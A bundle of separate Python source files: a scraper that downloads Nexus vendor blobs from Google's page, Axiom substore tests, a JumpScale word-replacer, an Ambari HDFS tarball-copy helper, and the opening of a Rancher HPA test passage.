directly to Nexus devices without the incorporation of so-called
'vendor blobs' -- precompiled drivers or shared libraries containing
vendor-proprietary code. It is the responsibility of the developer to
select the correct blob(s) and install them into an Android repo
client once the client has been created. This process is annoying
(lots of searching, clicking, typing "yes I accept" etc) and is
vulnerable to user error. In addition, new blobs are posted every
couple of weeks. Google publishes links to vendor blobs on a public
web page:
https://developers.google.com/android/nexus/blobs-preview
While the links to the actual blobs referred to om this web page change,
the rest of the page structures stays pretty much the same, meaning that
it's not hard to write something to scrape the page, locate the blobs,
and download them (hence the creation of this script).
See also 'install-aosp-blobs.py', which installs the correct set of
blobs in a client based on a device tag (ex: N5, N9, etc)
"""
import getopt
import os
import re
import sys
from lxml import html
import requests
import script_utils as u
#......................................................................
# Where to put blobs once we've downloaded them
flag_archive_dir = None
# What page to scrape to figure out what to download
flag_scrape_target = "https://developers.google.com/android/nexus/blobs-preview"
# Devices that we're interested in. Key is the tag we'll use to
# refer to the device; description is the raw text that we look
# for when scraping the blobs page
device_tags = {
# "N5": "Nexus 5 (GSM/LTE) (hammerhead) binaries for Android",
"N6": "Nexus 6 (Mobile) (shamu) binaries for Android",
"fugu": "Nexus Player (fugu) binaries for Android",
# "N7": "Nexus 7 (Wi-Fi) (flo) binaries for Android",
"N9": "Nexus 9 (flounder) binaries for Android",
}
def download_blob(device, version, link):
"""Download a specific blob."""
# create location if needed
devdir = "%s/%d" % (flag_archive_dir, version)
if not os.path.isdir(devdir):
os.mkdir(devdir)
verdir = "%s/%s/%s" % (flag_archive_dir, version, device)
if not os.path.isdir(verdir):
os.mkdir(verdir)
# download file
base = os.path.basename(link)
path = "%s/%s" % (verdir, base)
if not os.path.exists(path):
print("... downloading %s => %s" % (link, path))
u.docmd("curl -L %s -o %s" % (link, path))
else:
print("... skipping %s blob %s (exists in archive already)" % (device, link))
# Update current version link
curlink = "%s/cur" % flag_archive_dir
if os.path.exists(curlink):
try:
os.remove(curlink)
except OSError as err:
u.error("unable to remove current version "
"link %s: %s" % (curlink, err))
try:
os.symlink("%d" % version, "%s/cur" % flag_archive_dir)
except OSError as err:
u.error("unable to update current version link %s" % curlink)
def postprocess(scraper):
"""Postprocess contents of scraped target web page."""
if u.verbosity_level() > 0:
sys.stderr.write("dump of scraper state\n")
scraper.dump()
blobtable = scraper.blobtable()
version = scraper.version()
for device, rows in blobtable.items():
idx = 0
for r in rows:
u.verbose(1, "device=%s idx=%d blob=%s\n" % (device, idx, r[2]))
download_blob(device, version, r[2])
def usage(msgarg):
"""Print usage and exit."""
if msgarg:
sys.stderr.write("error: %s\n" % msgarg)
print("""\
usage: %s [options]
options:
-a D store downloaded blobs in archive dir D (def: /ssd/blobs)
-s T set scrape target to T (def: %s)
-d increase debug trace level
Downloads blobs from
https://developers.google.com/android/nexus/blobs-preview
and stores them in archive dir for future use.
""" % (os.path.basename(sys.argv[0]), flag_scrape_target))
sys.exit(1)
def parse_args():
"""Command line argument parsing."""
global flag_archive_dir, flag_scrape_target
try:
optlist, args = getopt.getopt(sys.argv[1:], "da:s:")
except getopt.GetoptError as err:
# unrecognized option
usage(str(err))
if args:
usage("unexpected extra args")
for opt, arg in optlist:
if opt == "-d":
u.increment_verbosity()
elif opt == "-a":
flag_archive_dir = arg
elif opt == "-s":
flag_scrape_target = arg
# Use $HOME/aosp_blobs if -a not specified
if not flag_archive_dir:
homedir = os.getenv("HOME")
if not homedir:
u.error("no setting for $HOME environment variable -- cannot continue")
flag_archive_dir = "%s/blobs" % homedir
sys.stderr.write("... archive dir not specified, "
"using %s\n" % flag_archive_dir)
# Does archive dir exist?
if os.path.exists(flag_archive_dir):
# Error if not a directory
if not os.path.isdir(flag_archive_dir):
u.error("specified archive dir %s is "
"not a directory" % flag_archive_dir)
else:
sys.stderr.write("... creating %s, since it "
"does not exist" % flag_archive_dir)
try:
os.mkdir(flag_archive_dir)
except OSError as err:
u.error("unable to create archive directory")
u.verbose(0, "... archive dir: '%s'" % flag_archive_dir)
u.verbose(0, "... scrape target: '%s'" % flag_scrape_target)
class NexusBlobPageScraper(object):
"""Helper class for scraping the Google Nexus vendor blobs page."""
def __init__(self, scrape_target, dev_tags):
self._scrape_target = scrape_target
self._device_tags = dev_tags
self._blobtable = {}
self._version = -1
def doit(self):
"""Top level method for scraper."""
# Suck in the web page
page = requests.get(self._scrape_target)
tree = html.fromstring(page.text)
# We're interested in the portions of the page containing
# blob tables. See below for an example. We'll key off the
# specific h3 text, then pick up the table that immediately
# follows it.
# Example:
#
# <h3>Nexus 7 (Mobile) (deb) binaries for Android (1856853)</h3>
#
# <table>
# <tr>
# <th>Hardware Component
# <th>Company
# <th>Download
# <th>MD5 Checksum
# <th>SHA-1 Checksum
# <tr>
# <td>Audio, Sensors
# <td>ASUS
# <td><a href="https://dl.google.com/...efb23bef.tgz">Link</a>
# <td>d15eb9e73a7706743eaa0d580880dafe
# <td>ac5b1c1d6234a942dc4883888d15e829dee3c749
# <tr>
# <td>NFC
# <td>Broadcom
# <td><a href="https://dl.google.com/...3-766ef5bf.tgz">Link</a>
# <td>1861ef5a58d9fd22768d088f09599842
# <td>fda601548b96e3fe8f956eb7f95531d54155cc9d
# ...
# </table>
#
for tag, device_desc in self._device_tags.items():
self._scrape_version(tag, device_desc, tree)
self._scrape_blobs(tag, device_desc, tree)
def version(self):
return self._version
def blobtable(self):
assert self._version > 0, ("no version recorded -- "
"scrape failed (or not run)")
return self._blobtable
def dump(self):
sys.stderr.write("version: %d\n" % self._version)
for tag, rowlist in self._blobtable.items():
idx = 0
print("\nDevice %s:" % tag)
for r in rowlist:
columns = " ".join(r)
print("%d: %s" % (idx, columns))
idx += 1
def _scrape_version(self, tag, device_desc, tree):
"""Collect the version number for the blob of interest."""
# Pick out the h3 text itself, since we need to use a pattern match
# to collect the version (which changes periodically)
xpath_query_h3 = "//*[contains(text(),'%s')]" % device_desc
heading = tree.xpath(xpath_query_h3)
heading_text = heading[0].text
matcher = re.compile(r"^\s*(.+)\s+\((\d+)\)\s*$")
m = matcher.match(heading_text)
if m is None:
u.error("internal error: h3 pattern match "
"failed for %s: text is %s" % tag, heading_text)
tagver = int(m.group(2))
if self._version < 0:
self._version = tagver
elif tagver != self._version:
u.error("blobs page has unexpected multiple "
"versions (%d and %d) -- not sure if this matters")
def _scrape_blobs(self, tag, device_desc, tree):
"""Scrape blobs of interest."""
# Scoop up the contents of the table that immediately
# follows the heading of interest
xpath_query_table = ("//*[contains(text(),'%s')]"
"/following-sibling::table[1]" % device_desc)
table = tree.xpath(xpath_query_table)
table_rows = table[0]
interesting_rows = table_rows[1:]
rowlist = []
for row in interesting_rows:
desc = row[0].text_content().strip()
company = row[1].text_content().strip()
# text content for the download link is just the string "Link"
# download_link = row[2].text_content().strip()
link_child = row[2].xpath("child::a/@href")
link_target = link_child[0].strip()
md5sum = row[3].text_content().strip()
sha1sum = row[4].text_content().strip()
columnlist = [desc, company, link_target, md5sum, sha1sum]
rowlist.append(columnlist)
self._blobtable[tag] = rowlist
#
#----------------------------------------------------------------------
# Main portion of script
#
parse_args()
bscraper = NexusBlobPageScraper(flag_scrape_target, device_tags)
bscraper.doit()
postprocess(bscraper)
| |
from twisted.application.service import Service, IService
from twisted.python import filepath
from twisted.trial import unittest
from axiom.store import Store
from axiom.item import Item
from axiom.substore import SubStore
from axiom.attributes import text, bytes, boolean, inmemory
class SubStored(Item):
schemaVersion = 1
typeName = 'substoredthing'
a = text()
b = bytes()
class YouCantStartThis(Item, Service):
parent = inmemory()
running = inmemory()
name = inmemory()
started = boolean(default=False)
def startService(self):
self.started = True
class YouShouldStartThis(Item, Service):
parent = inmemory()
running = inmemory()
name = inmemory()
started = boolean(default=False)
def startService(self):
self.started = True
class SubStoreTest(unittest.TestCase):
"""
Test on-disk creation of substores.
"""
def testOneThing(self):
"""
Ensure that items can be inserted into substores and
subsequently retrieved.
"""
topdb = filepath.FilePath(self.mktemp())
s = Store(topdb)
ss = SubStore.createNew(s, ['account', 'bob@divmod.com'])
s2 = ss.open()
ssd = SubStored(store=s2, a=u'hello world', b='what, its text')
oid = ss.storeID
oid2 = ssd.storeID
s2.close()
s.close()
reopens = Store(topdb)
reopenss = reopens.getItemByID(oid)
reopens2 = reopenss.open()
reopenssd = reopens2.getItemByID(oid2)
self.assertEquals(reopenssd.a, u'hello world')
self.assertEquals(reopenssd.b, 'what, its text')
def test_oneThingMemory(self):
"""
Ensure that items put into in-memory substores are retrievable.
"""
s = Store()
ss = SubStore.createNew(s, ['account', 'bob@divmod.com'])
s2 = ss.open()
ssd = SubStored(store=s2, a=u'hello world', b='what, its text')
oid = ss.storeID
oid2 = ssd.storeID
s2.close()
self.assertIdentical(s.getItemByID(oid), ss)
self.assertIdentical(ss.open(), s2)
item = s2.getItemByID(oid2)
self.assertEquals(item.a, u'hello world')
self.assertEquals(item.b, 'what, its text')
def test_hereTodayGoneTomorrow(self):
"""
Ensure that substores exist after closing them.
"""
s = Store()
ss = SubStore.createNew(s, ['account', 'bob@divmod.com'])
s2 = ss.open()
ssd = SubStored(store=s2, a=u'hello world', b='what, its text')
oid = ss.storeID
oid2 = ssd.storeID
s2.close()
#the following is done to mimic garbage collection of objects holding
#on to substores
del s2._openSubStore
ss = s.getItemByID(oid)
s2 = ss.open()
item = s2.getItemByID(oid2)
self.assertEquals(item.a, u'hello world')
self.assertEquals(item.b, 'what, its text')
def test_memorySubstoreFile(self):
"""
In-memory substores whose stores have file directories should be able
to create files.
"""
filesdir = filepath.FilePath(self.mktemp())
s = Store(filesdir=filesdir)
ss = SubStore.createNew(s, ['account', 'bob@divmod.com'])
s2 = ss.open()
f = s2.newFile("test.txt")
f.write("yay")
f.close()
self.assertEqual(open(f.finalpath.path).read(), "yay")
def test_createNewStringPath(self):
"""
Passing a string instead of a sequence of strings to
L{SubStore.createNew} results in an exception.
"""
s = Store()
e = self.assertRaises(
ValueError, SubStore.createNew, s, 'notasequence')
self.assertEqual(
e.args[0], "Received 'notasequence' instead of a sequence")
class SubStoreStartupSemantics(unittest.TestCase):
"""
These tests verify that interactions between store and substore services
are correct. They also provide some documentation of expected edge-case
behavior. Read the code if you are interested in how to get startup
notifications from substore items.
"""
def setUp(self):
"""
Set up the tests by creating a store and a substore and opening them
both.
"""
self.topdb = topdb = Store(filepath.FilePath(self.mktemp()))
self.ssitem = ssitem = SubStore.createNew(
topdb, ["dontstartme", "really"])
self.ss = ssitem.open()
self.serviceStarted = False
def testDontStartNormally(self):
"""
Substores' services are not supposed to be started when their parent
stores are.
"""
ss = self.ss
ycst = YouCantStartThis(store=ss)
ss.powerUp(ycst, IService)
self._startService()
self.failIf(ycst.started)
def testStartEverythingExplicitly(self):
"""
Substores implement IService themselves, just as regular stores do, via
the special-case machinery.
"""
ss = self.ss
ysst = YouShouldStartThis(store=ss)
ss.powerUp(ysst, IService)
self.topdb.powerUp(self.ssitem, IService)
self._startService()
self.failUnless(ysst.started)
def _startService(self):
"""
Start the service and make sure we know it's started so tearDown can
shut it down.
"""
assert not self.serviceStarted
self.serviceStarted = True
return IService(self.topdb).startService()
def tearDown(self):
"""
Stop services that may have been started by these test cases.
"""
if self.serviceStarted:
return IService(self.topdb).stopService()
| |
from JumpScale import j
import re
import random
class Synonym:
def __init__(self, name='', replaceWith='', simpleSearch="", addConfluenceLinkTags=False, replaceExclude=''):
"""
@param name: Name of the sysnoym
@param replaceWith: The replacement of simpleSearch
@param simpleSearch: Search string that'll be replaced with replaceWith
@addConfluenceLinkTags: True to add confluence tags around the synonym
@defSynonym: If True then this is a definition synonym, which can be used in spectools
"""
self.simpleSearch = simpleSearch
self.regexFind = ""
self.regexFindForReplace = ""
self.name = name
self.replaceWith = replaceWith
self.addConfluenceLinkTags = addConfluenceLinkTags
self.replaceExclude = replaceExclude
self._markers = dict()
if simpleSearch != "":
search = simpleSearch.replace("?", "[ -_]?") # match " " or "-" or "_" one or 0 time
if addConfluenceLinkTags:
bracketMatchStart = "(\[ *|)"
bracketMatchStop = "( *\]|)"
else:
bracketMatchStart = ""
bracketMatchStop = ""
self.regexFind = r"(?i)%s\b%s\b%s" % (bracketMatchStart, search.lower(), bracketMatchStop)
#self.regexFind=r"%s\b%s\b%s" % (bracketMatchStart,search.lower(),bracketMatchStop)
self.regexFindForReplace = self.regexFind
def setRegexSearch(self, regexFind, regexFindForReplace):
self.regexFind = regexFind
if regexFindForReplace == "":
regexFindForReplace = regexFind
self.regexFindForReplace = regexFindForReplace
self.simpleSearch = ""
def replace(self, text):
if self.replaceExclude:
# Check for any def tag that contains name "e.g: [ Q-Layer ]", remove them and put markers in place
text = self._replaceDefsWithMarkers(text)
text = j.tools.code.regex.replace(
regexFind=self.regexFind, regexFindsubsetToReplace=self.regexFindForReplace, replaceWith=self.replaceWith, text=text)
if self.replaceExclude:
# Remove the markers and put the original def tags back
text = self._replaceMarkersWithDefs(text)
return text
def _replaceDefsWithMarkers(self, text):
"""
Search for any def tags that contains the name of this synonym "e.g [Q-layer]" in text and replace that with a special marker. Also it stores markers and replaced string into the dict _markers
"""
# patterns you don't want to be replaced
pat = self.replaceExclude
matches = j.tools.code.regex.findAll(pat, text)
for match in matches:
mark = "$$MARKER$$%s$$" % random.randint(0, 1000)
self._markers[mark] = match
match = re.escape(match)
text = j.tools.code.regex.replace(
regexFind=match, regexFindsubsetToReplace=match, replaceWith=mark, text=text)
return text
def _replaceMarkersWithDefs(self, text):
"""
Removes markers out of text and puts the original strings back
"""
for marker, replacement in list(self._markers.items()):
marker = re.escape(marker)
text = j.tools.code.regex.replace(
regexFind=marker, regexFindsubsetToReplace=marker, replaceWith=replacement, text=text)
return text
def __str__(self):
out = "name:%s simple:%s regex:%s regereplace:%s replacewith:%s\n" % (
self.name, self.simpleSearch, self.regexFind, self.regexFindForReplace, self.replaceWith)
return out
def __repr__(self):
return self.__str__()
class WordReplacer:
def __init__(self):
self.synonyms = [] # array Synonym()
def synonymsPrint(self):
for syn in self.synonyms:
print(syn)
def synonymAdd(self, name='', simpleSearch='', regexFind='', regexFindForReplace='',
replaceWith='', replaceExclude='', addConfluenceLinkTags=False):
"""
Adds a new synonym to this replacer
@param name: Synonym name
@param simpleSearch: Search text for sysnonym, if you supply this, then the synonym will automatically generate a matching regex pattern that'll be used to search for this string, if you want to specificy the regex explicitly then use regexFind instead.
@param regexFind: Provide this regex only if you didn't provide simpleSearch, it represents the regex that'll be used in search for this synonym . It overrides the default synonym search pattern
@param regexFindForReplace: The subset within regexFind that'll be replaced for this synonym
"""
synonym = Synonym(name, replaceWith, simpleSearch, addConfluenceLinkTags, replaceExclude)
if regexFind:
synonym.setRegexSearch(regexFind, regexFindForReplace)
self.synonyms.append(synonym)
def reset(self):
self.synonyms = []
def synonymsAddFromFile(self, path, addConfluenceLinkTags=False):
"""
load synonym satements from a file in the following format
[searchStatement]:[replaceto]
or
'[regexFind]':'[regexReplace]':replaceto
note: delimiter is :
note: '' around regex statements
e.g.
******
master?daemon:ApplicationServer
application?server:ApplicationServer
'application[ -_]+server':'application[ -_]+server':ApplicationServer
'\[application[ -_]+server\]':'application[ -_]+server':ApplicationServer
******
@param addConfluenceLinkTags id True then replaced items will be surrounded by [] (Boolean)
"""
txt = j.sal.fs.fileGetContents(path)
for line in txt.split("\n"):
line = line.strip()
if line != "" and line.find(":") != -1:
if j.tools.code.regex.match("^'", line):
# found line which is regex format
splitted = line.split("'")
if len(splitted) != 4:
raise j.exceptions.RuntimeError(
"syntax error in synonym line (has to be 2 'regex' statements" % line)
syn = Synonym(replaceWith=splitted[2])
syn.setRegexSearch(regexFind=splitted[0], regexFindForReplace=splitted[1])
else:
find = line.split(":")[0]
replace = line.split(":")[1].strip()
syn = Synonym(replaceWith=replace, simpleSearch=find, addConfluenceLinkTags=addConfluenceLinkTags)
self.synonyms.append(syn)
def removeConfluenceLinks(self, text):
"""
find [...] and remove the [ and the ]
TODO: 2 (id:19)
"""
raise j.exceptions.RuntimeError("todo needs to be done, is not working now")
def replaceinside(matchobj):
match = matchobj.group()
# we found a match now
# print "regex:%s match:%s replace:%s" % (searchitem[1],match,searchitem[2])
if match.find("|") == -1:
match = re.sub("( *\])|(\[ *)", "", match)
toreplace = searchitem[2]
searchregexReplace = searchitem[1]
match = re.sub(searchregexReplace, toreplace, match)
return match
else:
return match
for searchitem in self.synonyms:
#text = re.sub(searchitem[0],searchitem[1], text)
text = re.sub(searchitem[0], replaceinside, text)
return text
def replace(self, text):
for syn in self.synonyms:
text = syn.replace(text)
return text
def replaceInConfluence(self, text):
"""
@[..|.] will also be looked for and replaced
"""
def replaceinside(matchobj):
match = matchobj.group()
# we found a match now
# print "regex:%s match:%s replace:%s" % (searchitem[1],match,searchitem[2])
if match.find("|") == -1:
match = re.sub("( *\])|(\[ *)", "", match)
match = re.sub(syn.regexFind, syn.replaceWith, match)
return match
else:
return match
for syn in self.synonyms:
# call function replaceinside when match
text = re.sub(syn.regexFind, replaceinside, text)
return text
def _addConfluenceLinkTags(self, word):
"""
add [ & ] to word
"""
if word.find("[") == -1 and word.find("]") == -1:
word = "[%s]" % word
return word
| |
#!/usr/bin/env python
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
__all__ = ["copy_to_hdfs", "get_sysprep_skip_copy_tarballs_hdfs"]
import os
import uuid
import tempfile
import re
from resource_management.libraries.script.script import Script
from resource_management.libraries.resources.hdfs_resource import HdfsResource
from resource_management.libraries.functions.default import default
from resource_management.core import shell
from resource_management.core.logger import Logger
from resource_management.libraries.functions import stack_tools
STACK_NAME_PATTERN = "{{ stack_name }}"
STACK_ROOT_PATTERN = "{{ stack_root }}"
STACK_VERSION_PATTERN = "{{ stack_version }}"
# TODO, in the future, each stack can define its own mapping of tarballs
# inside the stack definition directory in some sort of xml file.
# PLEASE DO NOT put this in cluster-env since it becomes much harder to change,
# especially since it is an attribute of a stack and becomes
# complicated to change during a Rolling/Express upgrade.
TARBALL_MAP = {
"slider": ("{0}/{1}/slider/lib/slider.tar.gz".format(STACK_ROOT_PATTERN, STACK_VERSION_PATTERN),
"/{0}/apps/{1}/slider/slider.tar.gz".format(STACK_NAME_PATTERN, STACK_VERSION_PATTERN)),
"tez": ("{0}/{1}/tez/lib/tez.tar.gz".format(STACK_ROOT_PATTERN, STACK_VERSION_PATTERN),
"/{0}/apps/{1}/tez/tez.tar.gz".format(STACK_NAME_PATTERN, STACK_VERSION_PATTERN)),
"tez_hive2": ("{0}/{1}/tez_hive2/lib/tez.tar.gz".format(STACK_ROOT_PATTERN, STACK_VERSION_PATTERN),
"/{0}/apps/{1}/tez_hive2/tez.tar.gz".format(STACK_NAME_PATTERN, STACK_VERSION_PATTERN)),
"hive": ("{0}/{1}/hive/hive.tar.gz".format(STACK_ROOT_PATTERN, STACK_VERSION_PATTERN),
"/{0}/apps/{1}/hive/hive.tar.gz".format(STACK_NAME_PATTERN, STACK_VERSION_PATTERN)),
"pig": ("{0}/{1}/pig/pig.tar.gz".format(STACK_ROOT_PATTERN, STACK_VERSION_PATTERN),
"/{0}/apps/{1}/pig/pig.tar.gz".format(STACK_NAME_PATTERN, STACK_VERSION_PATTERN)),
"hadoop_streaming": ("{0}/{1}/hadoop-mapreduce/hadoop-streaming.jar".format(STACK_ROOT_PATTERN, STACK_VERSION_PATTERN),
"/{0}/apps/{1}/mapreduce/hadoop-streaming.jar".format(STACK_NAME_PATTERN, STACK_VERSION_PATTERN)),
"sqoop": ("{0}/{1}/sqoop/sqoop.tar.gz".format(STACK_ROOT_PATTERN, STACK_VERSION_PATTERN),
"/{0}/apps/{1}/sqoop/sqoop.tar.gz".format(STACK_NAME_PATTERN, STACK_VERSION_PATTERN)),
"mapreduce": ("{0}/{1}/hadoop/mapreduce.tar.gz".format(STACK_ROOT_PATTERN, STACK_VERSION_PATTERN),
"/{0}/apps/{1}/mapreduce/mapreduce.tar.gz".format(STACK_NAME_PATTERN, STACK_VERSION_PATTERN)),
"spark": ("{0}/{1}/spark/lib/spark-{2}-assembly.jar".format(STACK_ROOT_PATTERN, STACK_VERSION_PATTERN, STACK_NAME_PATTERN),
"/{0}/apps/{1}/spark/spark-{0}-assembly.jar".format(STACK_NAME_PATTERN, STACK_VERSION_PATTERN)),
"spark2": ("/tmp/spark2/spark2-{0}-yarn-archive.tar.gz".format(STACK_NAME_PATTERN),
"/{0}/apps/{1}/spark2/spark2-{0}-yarn-archive.tar.gz".format(STACK_NAME_PATTERN, STACK_VERSION_PATTERN))
}
TARBALL_ADH_MAP = {
"tez": ("/usr/lib/tez/share/tez.tar.gz", "/apps/tez/tez.tar.gz"),
"spark2": ("/tmp/spark2/spark2-{0}-yarn-archive.tar.gz".format('ADH'),
"/apps/spark2/jars/spark2-{0}-yarn-archive.tar.gz".format('ADH')),
"tez_hive2": ("/usr/lib/tez/share/tez.tar.gz", "/apps/tez/tez.tar.gz"),
"hive": ("/usr/lib/hive/hive.tar.gz", "/apps/hive/hive.tar.gz"),
"pig": ("/usr/lib/pig/pig.tar.gz", "/apps/pig/pig.tar.gz"),
"mapreduce": ("/usr/lib/hadoop/mapreduce.tar.gz", "/apps/mapreduce/mapreduce.tar.gz"),
"sqoop": ("/usr/lib/sqoop/sqoop.tar.gz", "/apps/sqoop/sqoop.tar.gz"),
"hadoop_streaming": ("/usr/lib/hadoop-mapreduce/hadoop-streaming.jar", "/apps/mapreduce/hadoop-streaming.jar")
}
def get_sysprep_skip_copy_tarballs_hdfs():
import params
host_sys_prepped = default("/hostLevelParams/host_sys_prepped", False)
# By default, copy the tarballs to HDFS. If the cluster is sysprepped, then set based on the config.
sysprep_skip_copy_tarballs_hdfs = False
if host_sys_prepped:
sysprep_skip_copy_tarballs_hdfs = default("/configurations/cluster-env/sysprep_skip_copy_tarballs_hdfs", False)
return sysprep_skip_copy_tarballs_hdfs
def adh_tarball_paths(name):
if name.lower() in TARBALL_ADH_MAP:
(source_file, dest_file) = TARBALL_ADH_MAP[name.lower()]
return (True, source_file, dest_file)
else:
Logger.error("Cannot copy {0} tarball to HDFS because missing key in TARBALL_ADH_MAP.".format(str(name)))
return (False, None, None)
def get_tarball_paths(name, use_upgrading_version_during_upgrade=True, custom_source_file=None, custom_dest_file=None):
"""
For a given tarball name, get the source and destination paths to use.
:param name: Tarball name
:param use_upgrading_version_during_upgrade:
:param custom_source_file: If specified, use this source path instead of the default one from the map.
:param custom_dest_file: If specified, use this destination path instead of the default one from the map.
:return: A tuple of (success status, source path, destination path)
"""
stack_name = Script.get_stack_name()
if not stack_name:
Logger.error("Cannot copy {0} tarball to HDFS because stack name could not be determined.".format(str(name)))
return (False, None, None)
if stack_name == "ADH":
return adh_tarball_paths(name)
stack_version = get_current_version(use_upgrading_version_during_upgrade)
if not stack_version:
Logger.error("Cannot copy {0} tarball to HDFS because stack version could be be determined.".format(str(name)))
return (False, None, None)
stack_root = Script.get_stack_root()
if not stack_root:
Logger.error("Cannot copy {0} tarball to HDFS because stack root could be be determined.".format(str(name)))
return (False, None, None)
if name is None or name.lower() not in TARBALL_MAP:
Logger.error("Cannot copy tarball to HDFS because {0} is not supported in stack {1} for this operation.".format(str(name), str(stack_name)))
return (False, None, None)
(source_file, dest_file) = TARBALL_MAP[name.lower()]
if custom_source_file is not None:
source_file = custom_source_file
if custom_dest_file is not None:
dest_file = custom_dest_file
source_file = source_file.replace(STACK_NAME_PATTERN, stack_name.lower())
dest_file = dest_file.replace(STACK_NAME_PATTERN, stack_name.lower())
source_file = source_file.replace(STACK_ROOT_PATTERN, stack_root.lower())
dest_file = dest_file.replace(STACK_ROOT_PATTERN, stack_root.lower())
source_file = source_file.replace(STACK_VERSION_PATTERN, stack_version)
dest_file = dest_file.replace(STACK_VERSION_PATTERN, stack_version)
return (True, source_file, dest_file)
def get_current_version(use_upgrading_version_during_upgrade=True):
"""
Get the effective version to use to copy the tarballs to.
:param use_upgrading_version_during_upgrade: True, except when the RU/EU hasn't started yet.
:return: Version, or False if an error occurred.
"""
upgrade_direction = default("/commandParams/upgrade_direction", None)
is_stack_upgrade = upgrade_direction is not None
current_version = default("/hostLevelParams/current_version", None)
Logger.info("Default version is {0}".format(current_version))
if is_stack_upgrade:
if use_upgrading_version_during_upgrade:
# This is the version going to. In the case of a downgrade, it is the lower version.
current_version = default("/commandParams/version", None)
Logger.info("Because this is a Stack Upgrade, will use version {0}".format(current_version))
else:
Logger.info("This is a Stack Upgrade, but keep the version unchanged.")
else:
if current_version is None:
# During normal operation, the first installation of services won't yet know about the version, so must rely
# on <stack-selector> to get it.
stack_version = _get_single_version_from_stack_select()
if stack_version:
Logger.info("Will use stack version {0}".format(stack_version))
current_version = stack_version
if current_version is None:
message_suffix = "during stack %s" % str(upgrade_direction) if is_stack_upgrade else ""
Logger.warning("Cannot copy tarball because unable to determine current version {0}.".format(message_suffix))
return False
return current_version
def _get_single_version_from_stack_select():
"""
Call "<stack-selector> versions" and return the version string if only one version is available.
:return: Returns a version string if successful, and None otherwise.
"""
# Ubuntu returns: "stdin: is not a tty", as subprocess output, so must use a temporary file to store the output.
tmpfile = tempfile.NamedTemporaryFile()
tmp_dir = Script.get_tmp_dir()
tmp_file = os.path.join(tmp_dir, "copy_tarball_out.txt")
stack_version = None
out = None
stack_selector_path = stack_tools.get_stack_tool_path(stack_tools.STACK_SELECTOR_NAME)
get_stack_versions_cmd = "{0} versions > {1}".format(stack_selector_path, tmp_file)
try:
code, stdoutdata = shell.call(get_stack_versions_cmd, logoutput=True)
with open(tmp_file, 'r+') as file:
out = file.read()
except Exception, e:
Logger.logger.exception("Could not parse output of {0}. Error: {1}".format(str(tmp_file), str(e)))
finally:
try:
if os.path.exists(tmp_file):
os.remove(tmp_file)
except Exception, e:
Logger.logger.exception("Could not remove file {0}. Error: {1}".format(str(tmp_file), str(e)))
if code != 0 or out is None or out == "":
Logger.error("Could not verify stack version by calling '{0}'. Return Code: {1}, Output: {2}.".format(get_stack_versions_cmd, str(code), str(out)))
return None
matches = re.findall(r"([\d\.]+(?:-\d+)?)", out)
if matches and len(matches) == 1:
stack_version = matches[0]
elif matches and len(matches) > 1:
Logger.error("Found multiple matches for stack version, cannot identify the correct one from: {0}".format(", ".join(matches)))
return stack_version
def copy_to_hdfs(name, user_group, owner, file_mode=0444, custom_source_file=None, custom_dest_file=None, force_execute=False,
use_upgrading_version_during_upgrade=True, replace_existing_files=False, skip=False):
"""
:param name: Tarball name, e.g., tez, hive, pig, sqoop.
:param user_group: Group to own the directory.
:param owner: File owner
:param file_mode: File permission
:param custom_source_file: Override the source file path
:param custom_dest_file: Override the destination file path
:param force_execute: If true, will execute the HDFS commands immediately, otherwise, will defer to the calling function.
:param use_upgrading_version_during_upgrade: If true, will use the version going to during upgrade. Otherwise, use the CURRENT (source) version.
:param skip: If true, tarballs will not be copied as the cluster deployment uses prepped VMs.
:return: Will return True if successful, otherwise, False.
"""
import params
Logger.info("Called copy_to_hdfs tarball: {0}".format(name))
(success, source_file, dest_file) = get_tarball_paths(name, use_upgrading_version_during_upgrade,
custom_source_file, custom_dest_file)
if not success:
Logger.error("Could not copy tarball {0} due to a missing or incorrect parameter.".format(str(name)))
return False
if skip:
Logger.warning("Skipping copying {0} to {1} for {2} as it is a sys prepped host.".format(str(source_file), str(dest_file), str(name)))
return True
Logger.info("Source file: {0} , Dest file in HDFS: {1}".format(source_file, dest_file))
if not os.path.exists(source_file):
Logger.error("WARNING. Cannot copy {0} tarball because file does not exist: {1} . "
"It is possible that this component is not installed on this host.".format(str(name), str(source_file)))
return False
# Because CopyFromLocal does not guarantee synchronization, it's possible for two processes to first attempt to
# copy the file to a temporary location, then process 2 fails because the temporary file was already created by
# process 1, so process 2 tries to clean up by deleting the temporary file, and then process 1
# cannot finish the copy to the final destination, and both fail!
# For this reason, the file name on the destination must be unique, and we then rename it to the intended value.
# The rename operation is synchronized by the Namenode.
#unique_string = str(uuid.uuid4())[:8]
#temp_dest_file = dest_file + "." + unique_string
# The logic above cannot be used until fast-hdfs-resource.jar supports the mv command, or it switches
# to WebHDFS.
# If the directory already exists, it is a NO-OP
dest_dir = os.path.dirname(dest_file)
params.HdfsResource(dest_dir,
type="directory",
action="create_on_execute",
owner=owner,
mode=0555
)
# If the file already exists, it is a NO-OP
params.HdfsResource(dest_file,
type="file",
action="create_on_execute",
source=source_file,
group=user_group,
owner=owner,
mode=0444,
replace_existing_files=replace_existing_files,
)
Logger.info("Will attempt to copy {0} tarball from {1} to DFS at {2}.".format(name, source_file, dest_file))
# For improved performance, force_execute should be False so that it is delayed and combined with other calls.
# If still want to run the command now, set force_execute to True
if force_execute:
params.HdfsResource(None, action="execute")
return True
| |
import pytest
from rancher import ApiError
from .common import * # NOQA
namespace = {"p_client": None, "ns": None, "cluster": None, "project": None}
def test_create_hpa():
p_client = namespace["p_client"]
ns = namespace["ns"]
hpa, workload = create_hpa(p_client, ns)
p_client.delete(hpa, workload)
def test_edit_hpa():
p_client = namespace["p_client"]
ns = namespace["ns"]
hpa, workload = edit_hpa(p_client, ns)
p_client.delete(hpa, workload)
def test_delete_hpa():
p_client = namespace["p_client"]
ns = namespace["ns"]
hpa, workload = create_hpa(p_client, ns)
delete_hpa(p_client, hpa, ns)
p_client.delete(workload)
rbac_role_list = [
(CLUSTER_OWNER),
(PROJECT_OWNER),
(PROJECT_MEMBER),
(PROJECT_READ_ONLY),
